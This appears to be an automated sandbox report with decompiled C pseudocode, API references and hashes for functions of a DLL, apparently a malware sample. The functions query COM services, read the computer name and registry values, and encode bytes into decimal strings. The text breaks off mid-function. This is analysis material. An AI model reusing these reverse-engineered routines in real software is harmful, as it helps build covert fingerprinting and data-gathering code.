0x007d52d5
0x007d52db
0x007d52e3
0x007d52e4
0x007d52e9
0x007d52ea
0x007d52ec
0x007d52ef
0x007d52f0
0x007d52f1
0x007d52f7
0x007d538c
0x007d5391
0x007d5398
0x007d53a2
0x007d53a8
0x007d53aa
0x007d53b0
0x00000000
0x007d52fd
0x007d52fd
0x007d5304
0x007d530d
0x007d5311
0x007d5317
0x007d531a
0x007d5381
0x00000000
0x007d531c
0x007d531c
0x007d53b3
0x007d53b5
0x00000000
0x00000000
0x007d5322
0x007d5322
0x007d5322
0x007d5329
0x007d532f
0x007d5334
0x007d533c
0x007d533d
0x007d533e
0x007d5340
0x007d5344
0x007d5348
0x00000000
0x007d534a
0x007d534e
0x007d5353
0x007d535a
0x007d536a
0x007d536c
0x007d5372
0x007d5377
0x007d53b7
0x007d53b7
0x007d53c4
0x007d53c8
0x007d53cd
0x007d53d3
0x007d53d8
0x007d53e2
0x007d53e4
0x007d53ea
0x007d53ea
0x007d53ed
0x007d53f3
0x00000000
0x00000000
0x00000000
0x007d5377
0x00000000
0x007d5379
0x007d5379
0x007d537a
0x00000000
0x007d537f
0x007d531c
0x007d531a
0x007d5311
0x007d53f6
0x007d53f6
0x007d53fc
0x007d53fc
0x007d5405

APIs

IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,033B89D8,007DA582,?,?,?,?,?,?,?,?,?,?,?,007DA582), ref: 007D5364
IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,033B89D8,007DA582,?,?,?,?,?,?,?,007DA582,00000000,00000000,00000000,006D0063), ref: 007D53A2

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: QueryServiceUnknown_
String ID:
API String ID: 2042360610-0
Opcode ID: 7e830de427b44a6ef9a16d23cdd209595270b9cc8cb6b820e70b1570f38ce315
Instruction ID: a4771e66044ce070d4291b2fe780f71bebdd7b2422a17bd0e4604094661a4e0a
Opcode Fuzzy Hash: 7e830de427b44a6ef9a16d23cdd209595270b9cc8cb6b820e70b1570f38ce315
Instruction Fuzzy Hash: 15513EB5D00519AFCB10DFA8C888DAEB7B9FF48344B04859AE915EB350D779AD05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007D89FA, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E007D89FA(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E007D84F5(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x7dd27c; // 0x2bda5a8
						_t20 = _t68 + 0x7de1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E007D494F(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x007d8a00
0x007d8a03
0x007d8a13
0x007d8a1c
0x007d8a20
0x007d8aee
0x007d8af4
0x007d8af4
0x007d8a3a
0x007d8a3f
0x007d8a43
0x007d8a49
0x007d8a4e
0x007d8a55
0x007d8a64
0x007d8a64
0x007d8a68
0x007d8a6a
0x007d8a76
0x007d8a81
0x007d8a8c
0x007d8a90
0x007d8a9a
0x007d8a9e
0x007d8aa0
0x007d8aa5
0x007d8aac
0x007d8abc
0x007d8abc
0x007d8aa5
0x007d8a9e
0x007d8abe
0x007d8ac3
0x007d8ac8
0x007d8ac8
0x007d8ace
0x007d8ad4
0x007d8ad9
0x007d8ad9
0x007d8ade
0x007d8ae3
0x007d8ae3
0x007d8ade
0x007d8a68
0x007d8ae5
0x007d8aeb
0x00000000

APIs

Part of subcall function 007D84F5: SysAllocString.OLEAUT32(80000002), ref: 007D854C
Part of subcall function 007D84F5: SysFreeString.OLEAUT32(00000000), ref: 007D85B1

SysFreeString.OLEAUT32(?), ref: 007D8AD9
SysFreeString.OLEAUT32(007D9CAA), ref: 007D8AE3

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 2430c610924f7e3f98b91b5ee56a92a9a08417129fc59874e891a95139a740a2
Instruction ID: 582b88f792737f0014a65e009252ce38306fb9a8d12916c271305730990e0a6d
Opcode Fuzzy Hash: 2430c610924f7e3f98b91b5ee56a92a9a08417129fc59874e891a95139a740a2
Instruction Fuzzy Hash: DF315872600119EFCB21DF68C888C9BBB79FFC9740714865AF8159B310EA36AD51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007D5037, Relevance: 3.1, APIs: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E007D5037(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x7dd27c; // 0x2bda5a8
				_t2 = _t42 + 0x7de470; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x7dd27c; // 0x2bda5a8
					_t6 = _t45 + 0x7de490; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x7dd27c; // 0x2bda5a8
							_t30 = _v8;
							_t12 = _t48 + 0x7de480; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}

0x007d5043
0x007d5044
0x007d504a
0x007d5051
0x007d5053
0x007d5057
0x007d505b
0x007d505d
0x007d5066
0x007d506c
0x007d5074
0x007d5076
0x007d507a
0x007d507c
0x007d5089
0x007d508d
0x007d5092
0x007d5098
0x007d509d
0x007d50a5
0x007d50a7
0x007d50a9
0x007d50af
0x007d50af
0x007d50b2
0x007d50b8
0x007d50b8
0x007d50bb
0x007d50c1
0x007d50c1
0x007d50c8

APIs

IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 007D5074
IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 007D50A5

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: Interface_ProxyQueryUnknown_
String ID:
API String ID: 2522245112-0
Opcode ID: 59d2a54ab4741762a65137e7cd9ca0fcb6537968fec90411b149e7b1d039a1b4
Instruction ID: faf4135f86010a69ca89fb004464dab7871ae8de5b9082e2646a292194576f03
Opcode Fuzzy Hash: 59d2a54ab4741762a65137e7cd9ca0fcb6537968fec90411b149e7b1d039a1b4
Instruction Fuzzy Hash: C3213A75A01619EFCB10DBA4C888D5AB779FF88704B148A89F905EB354D635EE01CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 007D8F24, Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 007D8F4C

Part of subcall function 007D89FA: SysFreeString.OLEAUT32(?), ref: 007D8AD9

SafeArrayDestroy.OLEAUT32(?), ref: 007D8F99

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: ArraySafe$CreateDestroyFreeString
String ID:
API String ID: 3098518882-0
Opcode ID: dfc07ace3560cbc4e89f2538a50af9edde97659bdbd8fad94e9f0aea90691406
Instruction ID: aabd06e6ef36eb32a487e30c67d6e24ebb7334a79a21b42f0f8fe2e2e0f1c8a1
Opcode Fuzzy Hash: dfc07ace3560cbc4e89f2538a50af9edde97659bdbd8fad94e9f0aea90691406
Instruction Fuzzy Hash: DD11307290010ABFDF51DFA4CC45EAEB7B9BF08310F008056F901E6161D7799A15DB95

Uniqueness

Uniqueness Score: -1.00%

Function 007D570D, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E007D570D(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E007D3727(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E007D6EF8(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x007d5712
0x007d571d
0x007d571f
0x007d5725
0x007d5727
0x007d572c
0x007d5735
0x007d5739
0x007d5742
0x007d5746
0x007d5755
0x007d5748
0x007d5749
0x007d574e
0x007d574e
0x007d5746
0x007d5739
0x007d575e

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,007D975B,73BCF710,00000000,?,?,007D975B), ref: 007D5725

Part of subcall function 007D3727: RtlAllocateHeap.NTDLL(00000000,00000000,007D43D1), ref: 007D3733

GetComputerNameExA.KERNELBASE(00000003,00000000,007D975B,007D975C,?,?,007D975B), ref: 007D5742

Part of subcall function 007D6EF8: RtlFreeHeap.NTDLL(00000000,00000000,007D4499,00000000,?,?,00000000), ref: 007D6F04

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 9707bf59f357d83d439fe01f47cda4850c41a3faa05615c490b4cf430368f10d
Instruction ID: 76ee80b506a7f2ace6911806f6cbeb31604a2927170a87ddda8dfd5bfb7775ea
Opcode Fuzzy Hash: 9707bf59f357d83d439fe01f47cda4850c41a3faa05615c490b4cf430368f10d
Instruction Fuzzy Hash: A9F09A6A600549EBEB11D6AACC00FAF27BCDBC0760F24006AA904E3201EA78EE01D660

Uniqueness

Uniqueness Score: -1.00%

Function 007D7123, Relevance: 3.0, APIs: 2, Instructions: 35
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007D7123(WCHAR* _a4) {
				void* __edi;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				WCHAR* _t20;

				_t20 = E007D3727(lstrlenW(_a4) + _t7 + 0x5c);
				if(_t20 == 0) {
					_t18 = 8;
				} else {
					_t11 =  *0x7dd27c; // 0x2bda5a8
					_t5 = _t11 + 0x7dea68; // 0x43002f
					wsprintfW(_t20, _t5, 5, _a4);
					_t14 =  *0x7dd27c; // 0x2bda5a8
					_t6 = _t14 + 0x7de918; // 0x6d0063
					_t16 = E007D3D90(0, _t6, _t20, 0); // executed
					_t18 = _t16;
					E007D6EF8(_t20);
				}
				return _t18;
			}

0x007d7139
0x007d713d
0x007d717d
0x007d713f
0x007d7143
0x007d714a
0x007d7152
0x007d7158
0x007d7163
0x007d716c
0x007d7172
0x007d7174
0x007d7174
0x007d7182

APIs

lstrlenW.KERNEL32(73BCF710,00000000,00000001,007D380A,00000005,?,73BCF710,00000000,73BCF730,?,?,?,007D9F8C,?,00000001,?), ref: 007D7129

Part of subcall function 007D3727: RtlAllocateHeap.NTDLL(00000000,00000000,007D43D1), ref: 007D3733

wsprintfW.USER32 ref: 007D7152

Part of subcall function 007D3D90: memset.NTDLL ref: 007D3DB3
Part of subcall function 007D3D90: GetLastError.KERNEL32 ref: 007D3DFF

Part of subcall function 007D6EF8: RtlFreeHeap.NTDLL(00000000,00000000,007D4499,00000000,?,?,00000000), ref: 007D6F04

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
String ID:
API String ID: 1672627171-0
Opcode ID: 07ccb294eb25b532e72a6e431b89fee258e47a51e33c041a0596fe09372a2cdd
Instruction ID: cba37f052f8c38d006fc378cfb1264ae1ac7b57ef365e02bf2bcee5669bff7fc
Opcode Fuzzy Hash: 07ccb294eb25b532e72a6e431b89fee258e47a51e33c041a0596fe09372a2cdd
Instruction Fuzzy Hash: 51F0B476202514BBD221AB64EC49E5B77BDEFC4310F018163F544CB261D63DED05C765

Uniqueness

Uniqueness Score: -1.00%

Function 007D8095, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x7dd23c) == 0) {
						E007D9426();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x7dd23c) == 1) {
						_t10 = E007D947A(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x007d809c
0x007d809d
0x007d80a0
0x007d80d2
0x007d80d4
0x007d80d4
0x007d80a2
0x007d80a3
0x007d80b8
0x007d80bf
0x007d80c1
0x007d80c1
0x007d80bf
0x007d80a3
0x007d80dc

APIs

InterlockedIncrement.KERNEL32(007DD23C), ref: 007D80AA

Part of subcall function 007D947A: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,007D80BD,?), ref: 007D948D

InterlockedDecrement.KERNEL32(007DD23C), ref: 007D80CA

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: fd88ac52ec4b289381f7bc9321543c0e33b328a9436c9d40720c3d268df203d3
Instruction ID: 34722ea9e3bd59ff96de7bc29899a2472ddcd4004f08541e3938b20621401a5e
Opcode Fuzzy Hash: fd88ac52ec4b289381f7bc9321543c0e33b328a9436c9d40720c3d268df203d3
Instruction Fuzzy Hash: 19E086352451229386B11B649C08B7F66B0BF21B90F088517F583D1B50DE5CCC45E2D3

Uniqueness

Uniqueness Score: -1.00%

Function 007D82C4, Relevance: 1.6, APIs: 1, Instructions: 79
registryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E007D82C4(char _a4, void* _a8, char _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr* _a24) {
				void* _t25;
				intOrPtr* _t39;
				intOrPtr _t42;
				void* _t43;
				intOrPtr* _t44;

				if(_a4 != 0) {
					_t25 = E007DA30A(_a4, _a8, _a12, _a16, _a20, _a24); // executed
					_t43 = _t25;
				} else {
					_t43 =  *0x7dd0d4(_a8, _a12,  &_a8);
					if(_t43 == 0) {
						_t44 =  *0x7dd0d0; // 0x7dabfa
						 *_t44(_a8, _a16, 0,  &_a4, 0,  &_a12);
						if(_a12 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E007D3727(_a12);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 =  *_t44(_a8, _a16, 0,  &_a4, _t42,  &_a12);
								if(_t43 != 0) {
									E007D6EF8(_t42);
								} else {
									 *_a20 = _t42;
									_t39 = _a24;
									if(_t39 != 0) {
										 *_t39 = _a12;
									}
								}
							}
						}
						RegCloseKey(_a8);
					}
				}
				return _t43;
			}

0x007d82d0
0x007d8375
0x007d837a
0x007d82d6
0x007d82e6
0x007d82ea
0x007d82f0
0x007d8306
0x007d830b
0x007d8353
0x007d830d
0x007d8315
0x007d8319
0x007d8350
0x007d831b
0x007d832d
0x007d8331
0x007d8347
0x007d8333
0x007d8336
0x007d8338
0x007d833d
0x007d8342
0x007d8342
0x007d833d
0x007d8331
0x007d8319
0x007d835b
0x007d835b
0x007d82ea
0x007d8383

APIs

RegCloseKey.ADVAPI32(80000002,?,007D9CE1,3D007DC0,80000002,007D37CC,00000000,007D37CC,?,65696C43,80000002,00000000,?), ref: 007D835B

Part of subcall function 007D3727: RtlAllocateHeap.NTDLL(00000000,00000000,007D43D1), ref: 007D3733

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: AllocateCloseHeap
String ID:
API String ID: 3565931908-0
Opcode ID: ab88aa24ad98ff681f5a4570568d6ec774b4867eb361d20dceb2811d607d5364
Instruction ID: b79b0b76003810af125dcca405f0c8541b5ee31a2f45b78debe2ed85f8388e82
Opcode Fuzzy Hash: ab88aa24ad98ff681f5a4570568d6ec774b4867eb361d20dceb2811d607d5364
Instruction Fuzzy Hash: 4421377200025DBFDF119F94DC80CEE7BB9FB08760B148526FE1896220DB35DD619BA1

Uniqueness

Uniqueness Score: -1.00%

Function 007D7185, Relevance: 1.6, APIs: 1, Instructions: 75
memoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E007D7185(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x7dd238, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}

0x007d718a
0x007d718f
0x007d719d
0x007d71a3
0x007d71a7
0x007d7218
0x007d71a9
0x007d71ad
0x007d71b0
0x007d71b3
0x007d71ba
0x007d71bb
0x007d71bc
0x007d71c0
0x007d71c3
0x007d71ca
0x007d71d0
0x007d71d1
0x007d71d1
0x007d71d8
0x007d71d9
0x007d71da
0x007d71de
0x007d71ea
0x007d71f0
0x007d71f1
0x007d71f1
0x007d71f3
0x007d71f9
0x007d71fb
0x007d7200
0x007d7201
0x007d7201
0x007d7207
0x007d7210
0x007d7212
0x007d7215
0x007d7224

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 007D719D

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 70a608659e372df19e376495dda3e662314363264e36448bc92d5d0c169df7fb
Instruction ID: 20e13ab6cf1e5237ede2bce20aa45a5f4d809fd19bc978a98f17862d0f0610b8
Opcode Fuzzy Hash: 70a608659e372df19e376495dda3e662314363264e36448bc92d5d0c169df7fb
Instruction Fuzzy Hash: 8D110A316893459FEB098F29C851BE97BB5EB67358F14418FE4409B392C27B990BC760

Uniqueness

Uniqueness Score: -1.00%

Function 007DA30A, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E007DA30A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr* _a24) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t20;
				short _t22;
				short _t30;
				intOrPtr _t36;
				intOrPtr _t37;

				_t30 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t20 =  *0x7dd27c; // 0x2bda5a8
				_t4 = _t20 + 0x7de10c; // 0x33b86b4
				_t6 = _t20 + 0x7de2c0; // 0x650047
				_t36 = 0;
				_t22 = E007D89FA(_t4, _a4, _a8, _a12, _t6, _a16, _t4,  &_v20); // executed
				if(_t22 < 0) {
					_t30 = _t22;
				} else {
					if(_v20 != 0x2011) {
						_t30 = 1;
					} else {
						_t37 =  *((intOrPtr*)(_v12 + 0x10));
						if(_t37 != 0) {
							_t36 = E007D3727(_t37);
							if(_t36 == 0) {
								_t30 = 8;
							} else {
								E007DA880(_t37,  *((intOrPtr*)(_v12 + 0xc)), _t36);
							}
						}
						 *_a20 = _t36;
						 *_a24 = _t37;
						__imp__#16(_v12);
					}
				}
				return _t30;
			}

0x007da315
0x007da317
0x007da31e
0x007da31f
0x007da320
0x007da321
0x007da327
0x007da32c
0x007da336
0x007da340
0x007da348
0x007da34f
0x007da39c
0x007da351
0x007da357
0x007da399
0x007da359
0x007da35c
0x007da361
0x007da369
0x007da36d
0x007da381
0x007da36f
0x007da378
0x007da378
0x007da36d
0x007da388
0x007da38d
0x007da38f
0x007da38f
0x007da357
0x007da3a4

APIs

Part of subcall function 007D89FA: SysFreeString.OLEAUT32(?), ref: 007D8AD9

SafeArrayDestroy.OLEAUT32(00000000), ref: 007DA38F

Part of subcall function 007D3727: RtlAllocateHeap.NTDLL(00000000,00000000,007D43D1), ref: 007D3733

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: AllocateArrayDestroyFreeHeapSafeString
String ID:
API String ID: 3028586731-0
Opcode ID: c0b13c6affbae0c5cb0d49b061a94d107d96ca5cdeba10a5738d7fe4a8ef0280
Instruction ID: ddad71c2490124715d2704a44337a029470a850a094ffb7a6133c5a973a0fb9e
Opcode Fuzzy Hash: c0b13c6affbae0c5cb0d49b061a94d107d96ca5cdeba10a5738d7fe4a8ef0280
Instruction Fuzzy Hash: E2116036200109FFCB129FA8CC84CAEB7BABB48314B114566F91197261D7799E45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 007D8E7C, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E007D8E7C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x7dd27c; // 0x2bda5a8
				_t4 = _t15 + 0x7de39c; // 0x33b8944
				_t20 = _t4;
				_t6 = _t15 + 0x7de124; // 0x650047
				_t17 = E007D89FA(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E007D499C(_t20, _v12);
